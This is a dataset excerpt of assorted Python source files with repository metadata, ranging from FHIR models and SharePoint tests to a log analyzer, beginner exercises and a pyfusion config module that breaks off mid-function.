| column | dtype | stats |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 3–288 |
| content_id | string | lengths 40–40 |
| detected_licenses | list | lengths 0–112 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–115 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | 684 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M, nullable |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50, nullable |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19, nullable |
| gha_language | string | 147 classes |
| src_encoding | string | 25 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 128 – 12.7k |
| extension | string | 142 classes |
| content | string | lengths 128 – 8.19k |
| authors | list | lengths 1–1 |
| author_id | string | lengths 1–132 |
212ff7bb2d292acfcdecc48ba1e36050aa9e18ed
|
7b02411227428bb746e7622736dc006ee24ca925
|
/fhirclient/models/practitioner.py
|
a031183a9a28ca6bf7c19c5f0c4696218a018c6b
|
[] |
no_license
|
NCATS-Tangerine/CPKG
|
81c74abaec8de75ad769724e84d893dec117cf97
|
92b6079d61bdb975a0a4bc08879f56b686ff08ef
|
refs/heads/master
| 2022-12-10T17:55:52.586808
| 2019-08-20T20:19:56
| 2019-08-20T20:19:56
| 202,387,355
| 0
| 0
| null | 2022-12-08T06:01:57
| 2019-08-14T16:29:04
|
Python
|
UTF-8
|
Python
| false
| false
| 3,478
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated from FHIR 4.1.0-0931132380 (http://hl7.org/fhir/StructureDefinition/Practitioner) on 2019-08-06.
# 2019, SMART Health IT.
import sys
from dataclasses import dataclass
from typing import ClassVar, Optional, List
from .fhirabstractbase import empty_list
from .address import Address
from .attachment import Attachment
from .backboneelement import BackboneElement
from .codeableconcept import CodeableConcept
from .contactpoint import ContactPoint
from .domainresource import DomainResource
from .fhirdate import FHIRDate
from .fhirreference import FHIRReference
from .humanname import HumanName
from .identifier import Identifier
from .period import Period
@dataclass
class PractitionerQualification(BackboneElement):
""" Certification, licenses, or training pertaining to the provision of care.
The official certifications, training, and licenses that authorize or
otherwise pertain to the provision of care by the practitioner. For
example, a medical license issued by a medical board authorizing the
    practitioner to practice medicine within a certain locality.
"""
resource_type: ClassVar[str] = "PractitionerQualification"
identifier: Optional[List[Identifier]] = empty_list()
code: CodeableConcept = None
period: Optional[Period] = None
issuer: Optional[FHIRReference] = None
def elementProperties(self):
js = super(PractitionerQualification, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("code", "code", CodeableConcept, False, None, True),
("period", "period", Period, False, None, False),
("issuer", "issuer", FHIRReference, False, None, False),
])
return js
@dataclass
class Practitioner(DomainResource):
""" A person with a formal responsibility in the provisioning of healthcare or
related services.
A person who is directly or indirectly involved in the provisioning of
healthcare.
"""
resource_type: ClassVar[str] = "Practitioner"
identifier: Optional[List[Identifier]] = empty_list()
active: Optional[bool] = None
name: Optional[List[HumanName]] = empty_list()
telecom: Optional[List[ContactPoint]] = empty_list()
address: Optional[List[Address]] = empty_list()
gender: Optional[str] = None
birthDate: Optional[FHIRDate] = None
photo: Optional[List[Attachment]] = empty_list()
qualification: Optional[List[PractitionerQualification]] = empty_list()
communication: Optional[List[CodeableConcept]] = empty_list()
def elementProperties(self):
js = super(Practitioner, self).elementProperties()
js.extend([
("identifier", "identifier", Identifier, True, None, False),
("active", "active", bool, False, None, False),
("name", "name", HumanName, True, None, False),
("telecom", "telecom", ContactPoint, True, None, False),
("address", "address", Address, True, None, False),
("gender", "gender", str, False, None, False),
("birthDate", "birthDate", FHIRDate, False, None, False),
("photo", "photo", Attachment, True, None, False),
("qualification", "qualification", PractitionerQualification, True, None, False),
("communication", "communication", CodeableConcept, True, None, False),
])
return js
|
[
"solbrig@jhu.edu"
] |
solbrig@jhu.edu
|
b767dc6912417be37cab9363e2fe281e20c8e20d
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/nouns/_lookouts.py
|
435d7553390587072a7651b0c3278816d229a48a
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 245
|
py
|
from xai.brain.wordbase.nouns._lookout import _LOOKOUT
# class header
class _LOOKOUTS(_LOOKOUT, ):
def __init__(self,):
_LOOKOUT.__init__(self)
self.name = "LOOKOUTS"
self.specie = 'nouns'
self.basic = "lookout"
self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bb918660688b08138dfff3f921550e5811812b22
|
6ed01f4503fc9de234a561c945adff7cf4b1c81b
|
/dcsTools/logTools/LogAnalizer.py
|
b87902b91912124b60bb08ef9caa08a1222ab954
|
[] |
no_license
|
ostwald/python-lib
|
b851943c913a68424a05ce3c7b42878ff9519f68
|
9acd97ffaa2f57b3e9e632e1b75016549beb29e5
|
refs/heads/master
| 2021-10-28T06:33:34.156095
| 2021-10-21T23:54:49
| 2021-10-21T23:54:49
| 69,060,616
| 0
| 1
| null | 2018-06-21T16:05:30
| 2016-09-23T21:04:46
|
Roff
|
UTF-8
|
Python
| false
| false
| 2,332
|
py
|
"""
tool for analyzing catalina.out log files
e.g., "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
parses the log file and returns a list of Request objects
"""
import string
import sys
import os
import re
from time import strptime, strftime, gmtime, localtime, asctime, time, mktime
from Request import Request, logTimeToSecs
pat = re.compile ("\n\n")
def getRequests (path, filters=None):
"""
split the log file into "blobs" which are defined as chunks of text separated by a blank line
if the blob contains output from the RequestProcessor, create a Request object
optionally, a sessionID can be passed to look for Requests from that session only
"""
if type (filters) == type ("blah"):
filters = [filters]
s = open (path, 'r').read()
blobs = s.split ("\n\n")
print "processing %d blobs" % len (blobs)
requests = []
for blob in blobs:
line1 = blob.split("\n")[0]
if string.find (line1, "org.apache.struts.action.RequestProcessor process") != -1:
try:
request = Request (blob)
except:
print "failed to contstruct Request:", sys.exc_type, sys.exc_value
continue
if filters:
if (eval (string.join (filters, " and "))):
requests.append (request)
## accept = True
## for filter in filters:
## if not (eval (filter)):
## accept = False
## break
## if accept:
## requests.append (request)
else:
requests.append (request)
return requests
if __name__ == "__main__":
t1 = "Aug 12, 2005 12:00:01 AM"
t2 = "Aug 13, 2005 5:00:00 PM"
t1secs = logTimeToSecs (t1)
t2secs = logTimeToSecs (t2)
filters = None
path = "C:/Documents and Settings/ostwald/My Documents/DCS/Log Analysis/Catalina Logs/dcc-log.txt"
sessionId = "1DE5755F9DE662AD2D1615E23801027B"
filter1 = "request.sessionId == '%s'" % sessionId
filter2 = "request.time_stamp > %s and request.time_stamp < %s" % (t1secs, t2secs)
filter3 = "request.isStatusEvent()"
filters = (filter3,filter2)
requests = getRequests(path, filters)
if filters:
print "filters"
for f in filters:
print "\t" + f
print "%d requests extracted" % len (requests)
for i in range (min (len (requests), 10)):
print "\n-- %d / %d --\n%s" % ( i, len (requests), requests[i].log_entry)
## print "\n-- %d --%s" % ( i, requests[i].time_stamp)
|
[
"ostwald@ucar.edu"
] |
ostwald@ucar.edu
|
71d201020a8661345685b3fe0dcde8ba8c88b1f4
|
49ba5356bdc5df7dd9803b56fe507c5164a90716
|
/plus-one/test_solution.py
|
574ad18d65637674d36fc84b6ad97ac231f5ded6
|
[] |
no_license
|
uxlsl/leetcode_practice
|
d80ad481c9d8ee71cce0f3c66e98446ced149635
|
d8ed762d1005975f0de4f07760c9671195621c88
|
refs/heads/master
| 2021-04-25T18:12:28.136504
| 2020-03-11T07:54:15
| 2020-03-11T07:54:15
| 121,472,384
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 243
|
py
|
from solution import Solution
def test_solution():
s = Solution()
assert s.plusOne([1]) == [2]
assert s.plusOne([1, 2, 3]) == [1, 2, 4]
assert s.plusOne([1, 2, 9]) == [1, 3, 0]
assert s.plusOne([9, 9, 9]) == [1, 0, 0, 0]
|
[
"songlin.lin@yundata.com"
] |
songlin.lin@yundata.com
|
d4dcf28a56df6392227f886cba49f02edc0a4425
|
9152c6f5b692694c4cb95725319fc8dd21d30455
|
/tests/test_sharepoint_group.py
|
35ff7ddb18dd00b39d3d1f90d47262fff460b3cf
|
[
"MIT"
] |
permissive
|
VISIN9/Office365-REST-Python-Client
|
cf3de86a6bdd2461ff5814dbfa02d4d4185917d5
|
91c07d427a76197f6eb143c6253bdc832cbb889d
|
refs/heads/master
| 2021-05-25T08:43:35.530546
| 2020-04-06T20:24:53
| 2020-04-06T20:24:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,336
|
py
|
from tests.sharepoint_case import SPTestCase
class TestSharePointGroup(SPTestCase):
@classmethod
def setUpClass(cls):
super(TestSharePointGroup, cls).setUpClass()
cls.target_user_name = "i:0#.f|membership|mdoe@mediadev8.onmicrosoft.com"
target_group_name = "Communication site Visitors"
cls.target_group = cls.client.web.siteGroups.get_by_name(target_group_name)
def test1_get_current_user_groups(self):
groups = self.client.web.currentUser.groups
self.client.load(groups)
self.client.execute_query()
self.assertGreaterEqual(len(groups), 0)
def test2_add_user_to_group(self):
target_user = self.target_group.users.add_user(self.target_user_name)
self.client.execute_query()
self.assertIsNotNone(target_user.properties['Id'])
def test3_delete_user_from_group(self):
target_users = self.target_group.users
self.client.load(target_users)
self.client.execute_query()
users_count_before = len(target_users)
self.assertGreater(users_count_before, 0)
user_id = target_users[0].properties['Id']
target_users.remove_by_id(user_id)
self.client.load(target_users)
self.client.execute_query()
self.assertEqual(users_count_before, len(target_users) + 1)
|
[
"vvgrem@gmail.com"
] |
vvgrem@gmail.com
|
edee59048bf7db2a486cc4da27fba9608ec32e7a
|
909ae0ab0f4fe78de433c3d72b34b84848303ee8
|
/lending-club/venv/bin/jupyter-kernel
|
d0fe4631191e2897d3d90fd697e3b7c5e8f6b55c
|
[] |
no_license
|
jakekasan/data-science
|
f5cf2a7c0ead56e04a3549b930ca974495faae49
|
4bf589c268c517525abf3170c24cf42e0ae872cf
|
refs/heads/master
| 2021-09-17T21:18:51.278247
| 2018-07-05T07:31:51
| 2018-07-05T07:31:51
| 114,106,343
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 280
|
#!/Users/jakubkasan/coding/data-science/lending-club/venv/bin/python3.6
# -*- coding: utf-8 -*-
import re
import sys
from jupyter_client.kernelapp import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"jake.kasan@gmail.com"
] |
jake.kasan@gmail.com
|
|
3278d42f28e4adebbe01bf582c688739941488df
|
8e95e79840005f6c34dfb978e8fe6e0ec4f7f643
|
/9_Introduction to PySpark_/33_Test vs Train.py
|
658938186f8e89f8ce821abc3d047cec0a15515f
|
[] |
no_license
|
Naysla/Machine_Learning
|
a0593cac41ef1561f14bec55780570b82fc37720
|
e75d5cd2894ccb005228ab3da87dde9025385a08
|
refs/heads/master
| 2023-02-01T17:19:32.413609
| 2020-12-22T20:36:45
| 2020-12-22T20:36:45
| 323,708,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,086
|
py
|
#Test vs Train
#After you've cleaned your data and gotten it ready for modeling, one of the most important steps is to split the data into a test set and a train set. After that, don't touch your test data until you think you have a good model! As you're building models and forming hypotheses, you can test them on your training data to get an idea of their performance.
#
#Once you've got your favorite model, you can see how well it predicts the new data in your test set. This never-before-seen data will give you a much more realistic idea of your model's performance in the real world when you're trying to predict or classify new data.
#
#In Spark it's important to make sure you split the data after all the transformations. This is because operations like StringIndexer don't always produce the same index even when given the same list of strings.
#
#Why is it important to use a test set in model evaluation?
#By evaluating your model with a test set you can get a good idea of performance on new data.
#Exactly! A test set approximates the 'real world error' of your model.
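#
# A minimal, hedged sketch of the split itself (the DataFrame name `model_data`
# is illustrative, not from this lesson); per the note above, do the split only
# after all transformations:
#
# training, test = model_data.randomSplit([0.6, 0.4], seed=42)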
|
[
"60472499+Naysla@users.noreply.github.com"
] |
60472499+Naysla@users.noreply.github.com
|
92694715d35c931f58ea9fdacff0c277bec3d3a8
|
5ffed81ced523b6e417b4e48d20380b6f16f8f42
|
/exam/football_souvenirs.py
|
867e2341fa443122f3abe1f9ea0b7f84ec5776db
|
[] |
no_license
|
Nikoletazl/Basics-Python
|
0f3f095bd51f9546c681e3cdd268232de88749ab
|
17aef1b95814f13a02053681aae3e617e56f2fe6
|
refs/heads/main
| 2023-08-14T15:48:48.450249
| 2021-10-08T15:02:35
| 2021-10-08T15:02:35
| 415,027,622
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,959
|
py
|
team = input()
souvenirs = input()
count_souvenirs = int(input())
if souvenirs == "flags":
if team == "Argentina":
price = count_souvenirs * 3.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 4.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 2.75
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 3.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "caps":
if team == "Argentina":
price = count_souvenirs * 7.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 8.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 6.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 6.50
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "posters":
if team == "Argentina":
price = count_souvenirs * 5.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 5.35
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 4.95
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 4.80
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
elif souvenirs == "stickers":
if team == "Argentina":
price = count_souvenirs * 1.25
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Brazil":
price = count_souvenirs * 1.20
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Croatia":
price = count_souvenirs * 1.10
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
elif team == "Denmark":
price = count_souvenirs * 0.90
print(f'Pepi bought {count_souvenirs} {souvenirs} of {team} for {price:.2f} lv.')
else:
print("Invalid country!")
else:
print("Invalid stock!")
|
[
"noreply@github.com"
] |
Nikoletazl.noreply@github.com
|
132631fbc191c0d961db1e6783c48e19d8e8fd46
|
72d7cfbdd02f77300edb0f5e4104a1a147048ade
|
/djangoproject/myproject/users/migrations/0001_initial.py
|
e5e66726f68bb3366e771d7f04511d21d385f875
|
[] |
no_license
|
simrangrover5/batch430
|
33f3e59b7d2c70f87d796cc869855975ffef976a
|
ec841051d3a84cd56515aeff3b9d328cebea3705
|
refs/heads/master
| 2020-12-18T09:21:12.518412
| 2020-02-11T12:40:48
| 2020-02-11T12:40:48
| 235,325,192
| 1
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 608
|
py
|
# Generated by Django 3.0.1 on 2020-01-27 11:30
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Adduser',
fields=[
('username', models.CharField(max_length=100, unique=True)),
('email', models.EmailField(max_length=100, primary_key=True, serialize=False)),
('password', models.CharField(max_length=100)),
('pic', models.ImageField(upload_to='')),
],
),
]
|
[
"simrangrover5@gmail.com"
] |
simrangrover5@gmail.com
|
5ef8097cf66e2db0fa6b7d8d2d11a22a0d3f97e1
|
ce75bce747bf60b364bc2e516824fc69c64a7eec
|
/opengever/maintenance/scripts/archive/04_fix_ai_refnums.py
|
ede9e2ca2e686c1b7c72846ef4c543e7a57ffdfb
|
[] |
no_license
|
4teamwork/opengever.maintenance
|
c94e470af31f891d0969877533e5acd37369f70f
|
f2b9866fb6cce1d24e29b084b757eec857119479
|
refs/heads/master
| 2023-07-28T17:57:09.619138
| 2023-07-14T13:08:20
| 2023-07-14T13:08:20
| 14,493,557
| 2
| 0
| null | 2023-08-31T09:07:21
| 2013-11-18T13:46:30
|
Python
|
UTF-8
|
Python
| false
| false
| 6,511
|
py
|
from Acquisition import aq_inner
from Acquisition import aq_parent
from opengever.base.adapters import CHILD_REF_KEY
from opengever.base.adapters import DOSSIER_KEY
from opengever.base.adapters import PREFIX_REF_KEY
from opengever.base.adapters import REPOSITORY_FOLDER_KEY
from opengever.base.interfaces import IReferenceNumberFormatter
from opengever.base.interfaces import IReferenceNumberPrefix
from opengever.base.interfaces import IReferenceNumberSettings
from opengever.dossier.behaviors.dossier import IDossierMarker
from opengever.dossier.templatedossier import ITemplateDossier
from opengever.maintenance.debughelpers import setup_app
from opengever.maintenance.debughelpers import setup_plone
from opengever.repository.interfaces import IRepositoryFolder
from opengever.repository.repositoryroot import IRepositoryRoot
from opengever.task.task import ITask
from plone import api
from plone.registry.interfaces import IRegistry
from zope.annotation.interfaces import IAnnotations
from zope.app.intid.interfaces import IIntIds
from zope.component import getUtility
from zope.component import queryAdapter
import transaction
SEPARATOR = '-' * 78
class ReferenceNumberHelper(object):
"""Helper class for dealing with reference numbers.
"""
def __init__(self, log_func, site):
self.log = log_func
self.site = site
def get_repo_dossier_separator(self, obj=None):
registry = getUtility(IRegistry)
proxy = registry.forInterface(IReferenceNumberSettings)
formatter = queryAdapter(obj,
IReferenceNumberFormatter,
name=proxy.formatter)
return formatter.repository_dossier_seperator
def get_new_mapping(self, key, obj):
parent = aq_parent(aq_inner(obj))
ann = IAnnotations(parent)
if IDossierMarker.providedBy(obj):
mapping_base = ann.get(DOSSIER_KEY)
elif IRepositoryFolder.providedBy(obj) or IRepositoryRoot.providedBy(obj):
mapping_base = ann.get(REPOSITORY_FOLDER_KEY)
else:
raise Exception("Unknown object type!")
if not mapping_base:
return None
mapping = mapping_base.get(key)
return mapping
class ReferenceNumberFixer(object):
"""This is the fix for some previously run fixscripts.
It attempts to fix broken reference numbers. A new reference number has
been generated by mistake while moving content. Some fix-scrips have then
attempted to revert these reference numbers to their previous state. This
seems to have failed in come cases:
The reference numbers are now in an inconsistent state and have different
values in child_mapping and prefix_mapping. This script reverts the
reference numbers to the state as defined in child_mapping. If multiple
values are defined in child_mapping it takes the higher (later) one.
"""
def __init__(self, log_func, site):
self.catalog = api.portal.get_tool('portal_catalog')
self.parent_logger = log_func
self.site = site
self.helper = ReferenceNumberHelper(log_func, site)
self.intids = getUtility(IIntIds)
self.ignored_ids = ['vorlagen']
self.objs_to_reindex = set()
def log(self, msg):
msg = " " + msg
return self.parent_logger(msg)
def _fix_wrong_mappings(self, obj):
"""Detect the following errors:
- entry of reference number in prefix_mapping available
- no entry in child_mapping for that refernece numbers, but for
other (previous) reference numbers for that content object
"""
parent = aq_parent(aq_inner(obj))
local_number = IReferenceNumberPrefix(parent).get_number(obj)
intid = self.intids.getId(obj)
try:
child_mapping = self.helper.get_new_mapping(CHILD_REF_KEY, obj)
prefix_mapping = self.helper.get_new_mapping(PREFIX_REF_KEY, obj)
has_child_mapping = child_mapping.get(local_number) == intid
has_prefix_mapping = prefix_mapping.get(intid) == local_number
is_assigned_a_refnum = intid in set(child_mapping.values())
if not has_child_mapping:
if is_assigned_a_refnum:
self._revert_to_refnum_in_child_mapping(
obj, parent, local_number, intid, child_mapping, prefix_mapping)
else:
self.log("WARNING: obj %s not in child mapping of parent!" % obj)
if not has_prefix_mapping:
self.log("WARNING: obj %s not in prefix mapping of parent!" % obj)
except Exception, e:
self.log("WARNING: '%s' for %s" % (e, obj))
def _revert_to_refnum_in_child_mapping(self, obj, parent, local_number, intid, child_mapping, prefix_mapping):
previous_refnums = []
for key, value in child_mapping.iteritems():
if value == intid:
previous_refnums.append(key)
max_previous_refnum = unicode(max(map(int, previous_refnums)))
assert int(local_number) > int(max_previous_refnum)
# revert refnum to previous entry
prefix_mapping[intid] = max_previous_refnum
self.log("INFO: reverted %s (%s) from %s to %s" % (obj, intid, local_number, max_previous_refnum))
assert IReferenceNumberPrefix(parent).get_number(obj) == max_previous_refnum
for brain in self.catalog(path='/'.join(obj.getPhysicalPath())):
self.objs_to_reindex.add(brain.getObject())
def fix_child_mappings(self):
dossier_brains = self.catalog(object_provides=IDossierMarker.__identifier__)
for brain in dossier_brains:
obj = brain.getObject()
if ITemplateDossier.providedBy(obj):
continue
if obj.id in self.ignored_ids:
continue
self._fix_wrong_mappings(obj)
for obj in self.objs_to_reindex:
obj.reindexObject(idxs=['reference'])
if ITask.providedBy(obj):
obj.get_sql_object().sync_with(obj)
def main():
app = setup_app()
print SEPARATOR
plone = setup_plone(app, [])
# prevents erroneous execution
transaction.doom()
def log(msg):
print msg
fixer = ReferenceNumberFixer(log, plone)
print "Running 'fixing broken mappings'..."
fixer.fix_child_mappings()
print "Done"
if __name__ == '__main__':
main()
|
[
"david.erni@4teamwork.ch"
] |
david.erni@4teamwork.ch
|
ad5d1b7bda9bd683170c32f6da305b9a691513ef
|
9e988c0dfbea15cd23a3de860cb0c88c3dcdbd97
|
/sdBs/AllRun/ec_14270-1828/sdB_ec_14270-1828_lc.py
|
bdc07f94a156888a89f067ad64026758d3d61ea9
|
[] |
no_license
|
tboudreaux/SummerSTScICode
|
73b2e5839b10c0bf733808f4316d34be91c5a3bd
|
4dd1ffbb09e0a599257d21872f9d62b5420028b0
|
refs/heads/master
| 2021-01-20T18:07:44.723496
| 2016-08-08T16:49:53
| 2016-08-08T16:49:53
| 65,221,159
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 350
|
py
|
from gPhoton.gAperture import gAperture
def main():
gAperture(band="NUV", skypos=[217.450125,-18.693147], stepsz=30., csvfile="/data2/fleming/GPHOTON_OUTPU/LIGHTCURVES/sdBs/sdB_ec_14270-1828/sdB_ec_14270-1828_lc.csv", maxgap=1000., overwrite=True, radius=0.00555556, annulus=[0.005972227,0.0103888972], verbose=3)
if __name__ == "__main__":
main()
|
[
"thomas@boudreauxmail.com"
] |
thomas@boudreauxmail.com
|
7fc60fb3e6e5e97749994890220137591cb4ec56
|
51f6443116ef09aa91cca0ac91387c1ce9cb445a
|
/Curso_Python_3_UDEMY/banco_dados/incluir_contato.py
|
79c073a92c51debf70d449c7b8897597efd60f36
|
[
"MIT"
] |
permissive
|
DanilooSilva/Cursos_de_Python
|
f449f75bc586f7cb5a7e43000583a83fff942e53
|
8f167a4c6e16f01601e23b6f107578aa1454472d
|
refs/heads/main
| 2023-07-30T02:11:27.002831
| 2021-10-01T21:52:15
| 2021-10-01T21:52:15
| 331,683,041
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 442
|
py
|
from mysql.connector.errors import ProgrammingError
from db import nova_conexao
sql = 'INSERT INTO contatos (nome, tel) VALUES (%s, %s)'
args = ('Danilo', '94955-2951')
with nova_conexao() as conexao:
try:
cursor = conexao.cursor()
cursor.execute(sql, args)
conexao.commit()
except ProgrammingError as e:
        print(f'Error: {e.msg}')
    else:
        print('1 record inserted, ID:', cursor.lastrowid)
|
[
"dno.gomesps@gmail.com"
] |
dno.gomesps@gmail.com
|
acb65fbacc27a8ad5009c305ffa87265cef993a0
|
be6d5ac1b415335cc7a27cf44e3afa041ef299e3
|
/1_3.py
|
764d33752a0c10e1a5835a028ea67466c05963df
|
[
"MIT"
] |
permissive
|
JeffreyAsuncion/PCEP_training_2020_12
|
4746a28f399c499e1bc2c3bf848ce0b05ad903bd
|
7477fb57a526ca0efdd156811aa72fae6129b062
|
refs/heads/main
| 2023-02-05T07:52:13.374651
| 2020-12-20T16:50:24
| 2020-12-20T16:50:24
| 319,857,046
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 200
|
py
|
print(2**3)
print(2**3.)
print(2.**3)
print(2.**3.)
print(5//2)
print(2**2**3)
print(2*4)
print(2**4)
print(2.*4)
print(2**4.)
print(2/4)
print(2//4)
print(-2/4)
print(-2//4)
print(2%4)
print(2%-4)
|
[
"jeffrey.l.asuncion@gmail.com"
] |
jeffrey.l.asuncion@gmail.com
|
4cc163174dd2cd27ea349f42f6823c5afed30126
|
fd41984178ffba0846fa7ab1f67c1a0843a5e3ff
|
/py2与py3的区别和测试/1.作业-文件的封装/dealFile.py
|
43f453b28ac890199b9c17686a9fc1aff0e8e72b
|
[] |
no_license
|
LasterSmithKim/Python-Base
|
23f17472ee80f7224e96a4185775c9cd05ac7a98
|
27756126d999ddabf53b6bdc7114903a297464a0
|
refs/heads/master
| 2020-03-28T08:00:11.156911
| 2018-11-28T09:54:51
| 2018-11-28T09:54:51
| 147,939,778
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,170
|
py
|
import csv
import sys
import importlib
importlib.reload(sys)
from pdfminer.pdfparser import PDFParser,PDFDocument
from pdfminer.pdfinterp import PDFResourceManager,PDFPageInterpreter
from pdfminer.converter import PDFPageAggregator
from pdfminer.layout import LTTextBoxHorizontal,LAParams
from pdfminer.pdfinterp import PDFTextExtractionNotAllowed
class DealFile(object):
    # read CSV
def readCsv(self,path):
InfoList = []
with open(path, "r") as f:
allFileInfo = csv.reader(f)
print(allFileInfo)
for row in allFileInfo:
InfoList.append(row)
return InfoList
    # write CSV
    # data format: [[1,2,3],[4,5,6],[7,8,9]]
def writeCsv(self,path, data):
with open(path, "w") as f:
writer = csv.writer(f)
for rowData in data:
writer.writerow(rowData)
    # read PDF
def readPDF(self,path, callback=None,toPath=""):
f = open(path, "rb")
parser = PDFParser(f)
pdfFile = PDFDocument()
parser.set_document(pdfFile)
pdfFile.set_parser(parser)
pdfFile.initialize()
if not pdfFile.is_extractable:
raise PDFTextExtractionNotAllowed
else:
manager = PDFResourceManager()
laparams = LAParams()
device = PDFPageAggregator(manager, laparams=laparams)
interpreter = PDFPageInterpreter(manager, device)
for page in pdfFile.get_pages():
interpreter.process_page(page)
layout = device.get_result()
for x in layout:
if (isinstance(x, LTTextBoxHorizontal)):
                    # process each line of data
if toPath == "":
                        # process each individual line of data
str = x.get_text()
if callback != None:
callback(str)
else:
print(str)
else:
                        # write to a file
                        print("Writing the PDF content to a file:")
|
[
"kingone@yeah.net"
] |
kingone@yeah.net
|
39605e2d34194fa84b99d370e31e678f2bba6463
|
67929a76934c8c6bdacd573e2bc5ad6c0254d69c
|
/pyfusion/pyfusion/conf/utils.py
|
73bb7d253a04345383db0865cd7f7937bf7ccef3
|
[] |
no_license
|
SyntaxVoid/PyFusionDIIID
|
bc284b8480a8c4fc7881585c4fdd76ecc61162e4
|
4d19abed536f7b4d0322636828254ed3dd7a9b4c
|
refs/heads/master
| 2020-05-29T08:41:16.970539
| 2017-06-19T21:26:16
| 2017-06-19T21:26:16
| 69,825,057
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,471
|
py
|
""" Useful functions for manipulating config files."""
from ConfigParser import NoSectionError
import pyfusion
class CannotImportFromConfigError(Exception):
    """Failed to import a module, class or method from config setting."""
def import_from_str(string_value):
# TODO: make shortcuts for loading from within pyfusion
split_val = string_value.split('.')
val_module = __import__('.'.join(split_val[:-1]),
globals(), locals(),
[split_val[-1]])
return val_module.__dict__[split_val[-1]]
def import_setting(component, component_name, setting):
"""Attempt to import and return a config setting."""
value_str = pyfusion.config.pf_get(component, component_name, setting)
return import_from_str(value_str)
def kwarg_config_handler(component_type, component_name, **kwargs):
for config_var in pyfusion.config.pf_options(component_type, component_name):
if not config_var in kwargs.keys():
kwargs[config_var] = pyfusion.config.pf_get(component_type,
component_name, config_var)
return kwargs
def get_config_as_dict(component_type, component_name):
config_option_list = pyfusion.config.pf_options(component_type, component_name)
config_map = lambda x: (x, pyfusion.config.pf_get(component_type, component_name, x))
return dict(map(config_map, config_option_list))
def read_config(config_files):
"""Read config files.
Argument is either a single file object, or a list of filenames.
"""
try:
existing_database = pyfusion.config.get('global', 'database')
except NoSectionError:
existing_database = 'None'
try:
files_read = pyfusion.config.readfp(config_files)
except:
files_read = pyfusion.config.read(config_files)
if files_read != None: # readfp returns None
if len(files_read) == 0:
raise LookupError, str('failed to read config files from [%s]' %
(config_files))
config_database = pyfusion.config.get('global', 'database')
